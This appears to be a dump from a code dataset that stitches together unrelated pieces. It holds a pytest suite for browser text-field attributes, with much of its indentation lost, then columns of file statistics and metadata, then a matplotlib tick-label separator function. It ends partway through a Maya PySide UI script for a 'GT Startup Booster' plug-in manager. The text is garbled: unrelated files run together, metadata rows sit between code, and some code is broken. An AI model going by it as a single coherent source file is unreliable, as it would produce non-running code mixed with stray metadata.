# input type='hidden' should not be found by #text_field
assert browser.text_field(id='new_user_interests_dolls').exists is False
def test_raises_correct_exception_when_what_argument_is_invalid(self, browser):
with pytest.raises(TypeError):
browser.text_field(id=3.14).exists
class TestTextFieldAttributes(object):
    """Attribute accessors (#id, #name, #title, #type, #value) on text
    fields, including the UnknownObjectException raised for missing
    elements."""

    # id
    def test_returns_the_id_if_the_element_exists_and_has_id(self, browser):
        assert browser.text_field(index=4).id == 'new_user_occupation'

    @pytest.mark.usefixtures('quick_timeout')
    def test_raises_correct_exception_for_id_if_the_element_doesnt_exist(self, browser):
        with pytest.raises(UnknownObjectException):
            browser.text_field(index=1337).id

    # name
    def test_returns_the_name_if_the_element_exists_and_has_name(self, browser):
        assert browser.text_field(index=3).name == 'new_user_email_confirm'

    @pytest.mark.usefixtures('quick_timeout')
    def test_raises_correct_exception_for_name_if_the_element_doesnt_exist(self, browser):
        with pytest.raises(UnknownObjectException):
            browser.text_field(index=1337).name

    # title
    def test_returns_the_title_if_the_element_exists_and_has_title(self, browser):
        assert browser.text_field(id='new_user_code').title == 'Your personal code'

    @pytest.mark.usefixtures('quick_timeout')
    def test_raises_correct_exception_for_title_if_the_element_doesnt_exist(self, browser):
        with pytest.raises(UnknownObjectException):
            browser.text_field(index=1337).title

    # type
    def test_returns_the_type_if_the_element_exists_and_has_type(self, browser):
        assert browser.text_field(index=3).type == 'text'

    # FIX: these two methods lacked the 'test_' prefix, so pytest never
    # collected or ran them
    def test_returns_text_if_the_type_attribute_is_invalid(self, browser):
        assert browser.text_field(id='new_user_last_name').type == 'text'

    def test_returns_text_if_the_type_attribute_does_not_exist(self, browser):
        assert browser.text_field(id='new_user_first_name').type == 'text'

    @pytest.mark.usefixtures('quick_timeout')
    def test_raises_correct_exception_for_type_if_the_element_doesnt_exist(self, browser):
        with pytest.raises(UnknownObjectException):
            browser.text_field(index=1337).type

    # value
    def test_returns_the_value_if_the_element_exists_and_has_value(self, browser):
        assert browser.text_field(name='new_user_occupation').value == 'Developer'
        assert browser.text_field(index=4).value == 'Developer'
        assert browser.text_field(name=compile(r'new_user_occupation',
                                               flags=IGNORECASE)).value == 'Developer'

    @pytest.mark.usefixtures('quick_timeout')
    def test_raises_correct_exception_for_value_if_the_element_doesnt_exist(self, browser):
        with pytest.raises(UnknownObjectException):
            browser.text_field(index=1337).value
def test_finds_all_attribute_methods(browser):
    """Every expected attribute accessor is present on a text field."""
    for attr in ('class_name', 'id', 'name', 'title', 'type', 'value'):
        assert hasattr(browser.text_field(index=0), attr)
# State predicates on text fields: enabled / disabled / readonly, plus the
# guard that writing to a read-only field raises ObjectReadOnlyException.
class TestTextFieldAccessMethods(object):
# enabled
def test_returns_true_for_enabled_text_fields(self, browser):
assert browser.text_field(name='new_user_occupation').enabled is True
assert browser.text_field(id='new_user_email').enabled is True
def test_returns_false_for_disabled_text_fields(self, browser):
assert browser.text_field(name='new_user_species').enabled is False
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_enabled_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).enabled
# disabled
def test_returns_true_for_disabled_text_fields(self, browser):
assert browser.text_field(name='new_user_species').disabled is True
def test_returns_false_for_enabled_text_fields(self, browser):
assert browser.text_field(index=0).disabled is False
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_disabled_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).disabled
# readonly
def test_returns_true_for_readonly(self, browser):
assert browser.text_field(name='new_user_code').readonly is True
assert browser.text_field(id='new_user_code').readonly is True
def test_returns_false_for_writable_text_fields(self, browser):
assert browser.text_field(name='new_user_email').readonly is False
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_readonly_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).readonly
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_if_sending_keys_to_readonly_element(self, browser):
with pytest.raises(ObjectReadOnlyException):
browser.text_field(id='new_user_code').set('foo')
| 48.787129
| 104
| 0.750279
| 1,379
| 9,855
| 5.029007
| 0.096447
| 0.107714
| 0.182264
| 0.199856
| 0.836626
| 0.80995
| 0.752704
| 0.680894
| 0.596107
| 0.536265
| 0
| 0.006258
| 0.156875
| 9,855
| 201
| 105
| 49.029851
| 0.828379
| 0.039371
| 0
| 0.123188
| 0
| 0
| 0.108031
| 0.016083
| 0
| 0
| 0
| 0
| 0.485507
| 1
| 0.23913
| false
| 0
| 0.028986
| 0
| 0.289855
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c13a021fb762848140916a86c40d1682f349a2e6
| 29,791
|
py
|
Python
|
grplot/features/sep/tick_sep/tick_sep_def.py
|
ghiffaryr/grplot
|
43ea08febac4ffecbce0a6a3d679850f5013aa28
|
[
"BSD-3-Clause"
] | null | null | null |
grplot/features/sep/tick_sep/tick_sep_def.py
|
ghiffaryr/grplot
|
43ea08febac4ffecbce0a6a3d679850f5013aa28
|
[
"BSD-3-Clause"
] | null | null | null |
grplot/features/sep/tick_sep/tick_sep_def.py
|
ghiffaryr/grplot
|
43ea08febac4ffecbce0a6a3d679850f5013aa28
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib as mpl
from matplotlib import ticker
import locale
from pandas.api.types import is_float_dtype, is_integer_dtype
def tick_sep_def(ax, axis, sep):
lim = mpl.rcParams["axes.formatter.limits"] # default: lim = [-5,6]
if axis == 'x':
# comma
if sep == ',':
xnum = []
for x in ax.get_xticks():
if (abs(x) <= 10**lim[0] and abs(x) != 0) or abs(x) >= 10**lim[1]:
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x))
else: # abs(x) >= 1 and abs(x) < 10**lim[1]
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)))
else:
xnum.append('{:,.1f}'.format(x))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep == ',c':
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
if (abs(x) == 0) or (abs(x) >= 0.01):
xnum.append('{:,.2f}'.format(x))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x))
else: # abs(x) >= 1
xnum.append('{:,.2f}'.format(x))
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep in [',L', ',cL']:
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
else: # abs(x) > 10**lim[0]
if abs(x) < 1:
if sep == ',cL' and ((abs(x) == 0) or (abs(x) >= 0.01)):
xnum.append('{:,.2f}'.format(x))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x))
elif abs(x) < 1_000:
if sep == ',L':
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)))
else:
xnum.append('{:,.1f}'.format(x))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x))
else:
pass
else: # sep == ',cL'
xnum.append('{:,.2f}'.format(x))
elif abs(x) < 1_000_000:
num = x/1_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}K'.format(int(num)))
else:
xnum.append('{:,.1f}K'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}K'.format(num))
else:
pass
elif abs(x) < 1_000_000_000:
num = x/1_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}M'.format(int(num)))
else:
xnum.append('{:,.1f}M'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}M'.format(num))
else:
pass
elif abs(x) < 1_000_000_000_000:
num = x/1_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}B'.format(int(num)))
else:
xnum.append('{:,.1f}B'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}B'.format(num))
else:
pass
elif abs(x) < 1_000_000_000_000_000:
num = x/1_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}T'.format(int(num)))
else:
xnum.append('{:,.1f}T'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}T'.format(num))
else:
pass
else: # abs(x) >= 1_000_000_000_000_000:
num = x/1_000_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}Q'.format(int(num)))
else:
xnum.append('{:,.1f}Q'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}Q'.format(num))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
# dot
elif sep == '.':
xnum = []
for x in ax.get_xticks():
if (abs(x) <= 10**lim[0] and abs(x) != 0) or abs(x) >= 10**lim[1]:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(x) >= 1 and abs(x) < 10**lim[1]
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep == '.c':
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
if (abs(x) == 0) or (abs(x) >= 0.01):
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(x) >= 1
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep in ['.L', '.cL']:
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
else: # abs(x) > 10**lim[0]
if abs(x) < 1:
if sep == '.cL' and ((abs(x) == 0) or (abs(x) >= 0.01)):
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(x) < 1_000:
if sep == '.L':
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # sep == '.cL'
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(x) < 1_000_000:
num = x/1_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}K'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(x) < 1_000_000_000:
num = x/1_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}M'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(x) < 1_000_000_000_000:
num = x/1_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}B'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(x) < 1_000_000_000_000_000:
num = x/1_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}T'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # abs(x) >= 1_000_000_000_000_000:
num = x/1_000_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}Q'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
else:
raise Exception('Unknown sep argument!')
elif axis == 'y':
# comma
if sep == ',':
ynum = []
for y in ax.get_yticks():
if (abs(y) <= 10**lim[0] and abs(y) != 0) or abs(y) >= 10**lim[1]:
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y))
else: # abs(y) >= 1 and abs(y) < 10**lim[1]
if is_float_dtype(type(y)) == True:
if y.is_integer() == True:
ynum.append('{:,}'.format(int(y)))
else:
ynum.append('{:,.1f}'.format(y))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep == ',c':
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
if (abs(y) == 0) or (abs(y) >= 0.01):
ynum.append('{:,.2f}'.format(y))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y))
else: # abs(y) >= 1
ynum.append('{:,.2f}'.format(y))
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep in [',L', ',cL']:
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
else: # abs(y) > 10**lim[0]
if abs(y) < 1:
if sep == ',cL' and ((abs(y) == 0) or (abs(y) >= 0.01)):
ynum.append('{:,.2f}'.format(y))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y))
elif abs(y) < 1_000:
if sep == ',L':
if is_float_dtype(type(y)) == True:
if y.is_integer() == True:
ynum.append('{:,}'.format(int(y)))
else:
ynum.append('{:,.1f}'.format(y))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y))
else:
pass
else: # sep == ',cL'
ynum.append('{:,.2f}'.format(y))
elif abs(y) < 1_000_000:
num = y/1_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}K'.format(int(num)))
else:
ynum.append('{:,.1f}K'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}K'.format(num))
else:
pass
elif abs(y) < 1_000_000_000:
num = y/1_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}M'.format(int(num)))
else:
ynum.append('{:,.1f}M'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}M'.format(num))
else:
pass
elif abs(y) < 1_000_000_000_000:
num = y/1_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}B'.format(int(num)))
else:
ynum.append('{:,.1f}B'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}B'.format(num))
else:
pass
elif abs(y) < 1_000_000_000_000_000:
num = y/1_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}T'.format(int(num)))
else:
ynum.append('{:,.1f}T'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}T'.format(num))
else:
pass
else: # abs(y) >= 1_000_000_000_000_000:
num = y/1_000_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}Q'.format(int(num)))
else:
ynum.append('{:,.1f}Q'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}Q'.format(num))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
# dot
elif sep == '.':
ynum = []
for y in ax.get_yticks():
if (abs(y) <= 10**lim[0] and abs(y) != 0) or abs(y) >= 10**lim[1]:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(y) >= 1 and abs(y) < 10**lim[1]
if is_float_dtype(type(y)) == True:
if y.is_integer():
ynum.append('{:,}'.format(int(y)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep == '.c':
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
if (abs(y) == 0) or (abs(y) >= 0.01):
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(y) >= 1
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep in ['.L', '.cL']:
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
else: # abs(y) > 10**lim[0]
if abs(y) < 1:
if sep == '.cL' and ((abs(y) == 0) or (abs(y) >= 0.01)):
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(y) < 1_000:
if sep == '.L':
if is_float_dtype(type(y)) == True:
if y.is_integer() == True:
ynum.append('{:,}'.format(int(y)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # sep == '.cL'
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(y) < 1_000_000:
num = y/1_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}K'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(y) < 1_000_000_000:
num = y/1_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}M'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(y) < 1_000_000_000_000:
num = y/1_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}B'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(y) < 1_000_000_000_000_000:
num = y/1_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}T'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # abs(y) >= 1_000_000_000_000_000:
num = y/1_000_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}Q'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
else:
raise Exception('Unknown sep argument!')
else:
raise Exception('Unsupported axis!')
mpl.rcParams['axes.formatter.use_locale'] = False
return ax
| 52.914742
| 124
| 0.351247
| 2,743
| 29,791
| 3.679548
| 0.032446
| 0.155355
| 0.053502
| 0.089171
| 0.975032
| 0.973645
| 0.970376
| 0.962449
| 0.951154
| 0.943624
| 0
| 0.043453
| 0.473163
| 29,791
| 563
| 125
| 52.914742
| 0.599618
| 0.016683
| 0
| 0.863309
| 0
| 0
| 0.044313
| 0.006697
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001799
| false
| 0.071942
| 0.007194
| 0
| 0.010791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c1546c9b3964886da733b2d62dd59f21432d9d87
| 57,214
|
py
|
Python
|
python-scripts/gt_startup_booster.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
python-scripts/gt_startup_booster.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
python-scripts/gt_startup_booster.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
"""
GT Startup Booster - A script for managing which plugins get loaded when starting Maya.
@Guilherme Trevisan - TrevisanGMW@gmail.com - 2020-11-20 - github.com/TrevisanGMW
"""
try:
from shiboken2 import wrapInstance
except ImportError:
from shiboken import wrapInstance
try:
from PySide2 import QtWidgets, QtGui, QtCore
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QWidget
except ImportError:
from PySide import QtWidgets, QtGui, QtCore
from PySide.QtGui import QIcon, QWidget
import maya.cmds as cmds
import maya.mel as mel
import maya.OpenMayaUI as omui
import sys
# Script Version
script_version = "1.0"
# Script Name
script_name = "GT Startup Booster"
def build_gui_startup_booster():
    '''
    Builds the main UI for GT Startup Booster.

    Creates a window with a table showing every heavy plug-in file, whether it is
    set to auto-load and whether it is currently loaded, plus per-renderer buttons
    to create shelf loaders and toggle the auto-load flag.
    '''
    # Re-create the window from scratch if it is already open
    if cmds.window("build_gui_startup_booster", exists=True):
        cmds.deleteUI("build_gui_startup_booster")

    # main dialog Start Here =================================================================================
    build_gui_startup_booster = cmds.window("build_gui_startup_booster",
                                            title='GT Startup Booster - (v' + script_version + ')',
                                            titleBar=True, minimizeButton=False, maximizeButton=False, sizeable=True)
    cmds.window(build_gui_startup_booster, e=True, s=True, wh=[1, 1])
    content_main = cmds.columnLayout(adj=True)

    # Title Text
    title_bgc_color = (.4, .4, .4)
    cmds.separator(h=10, style='none')  # Empty Space
    cmds.rowColumnLayout(nc=1, cw=[(1, 330)], cs=[(1, 10)], p=content_main)  # Window Size Adjustment
    cmds.rowColumnLayout(nc=3, cw=[(1, 10), (2, 260), (3, 50)], cs=[(1, 10), (2, 0), (3, 0)], p=content_main)  # Title Column
    cmds.text(" ", bgc=title_bgc_color)  # Tiny Empty Green Space
    cmds.text(script_name, bgc=title_bgc_color, fn="boldLabelFont", align="left")
    cmds.button(l="Help", bgc=title_bgc_color, c=lambda x: build_gui_help_startup_booster())
    cmds.separator(h=3, style='none', p=content_main)  # Empty Space

    # Plug-in table header
    cmds.separator(h=5, style='none')  # Empty Space
    cell_size = 65
    cmds.rowColumnLayout(p=content_main, numberOfColumns=4,
                         columnWidth=[(1, 110), (2, cell_size), (3, cell_size), (4, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5)])
    cmds.text('Plugin File')
    cmds.text('Auto Load')
    cmds.text('Installed')
    cmds.text('Control')
    plugin_name_font = 'smallPlainLabelFont'

    # Arnold
    cmds.separator(h=5, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=4,
                         columnWidth=[(1, 110), (2, cell_size), (3, cell_size), (4, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5)])
    cmds.text('"mtoa.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    # The first positional argument of cmds.text is the control name, used later
    # by refresh_startup_booster_ui to update the 'Active'/'Inactive' labels.
    cmds.text('mtoa_autoload', label='...', bgc=(.2, .2, .2))
    cmds.text('mtoa_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Arnold', bgc=(.3, .3, .3))

    # Redshift
    cmds.separator(h=2, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=4,
                         columnWidth=[(1, 110), (2, cell_size), (3, cell_size), (4, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5)])
    cmds.text('"redshift4maya.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
    cmds.text('redshift4maya_autoload', label='...', bgc=(.2, .2, .2))
    cmds.text('redshift4maya_loaded', label='...', bgc=(.3, .3, .3))
    cmds.text(label='Redshift', bgc=(.3, .3, .3))

    # Bifrost (a group of several plug-in files)
    cmds.separator(h=2, style='none')  # Empty Space
    cmds.rowColumnLayout(p=content_main, numberOfColumns=4,
                         columnWidth=[(1, 110), (2, cell_size), (3, cell_size), (4, cell_size)],
                         cs=[(1, 10), (2, 5), (3, 5), (4, 5)])
    cmds.text('"Boss.mll"', bgc=(.2, .2, .2), fn=plugin_name_font)
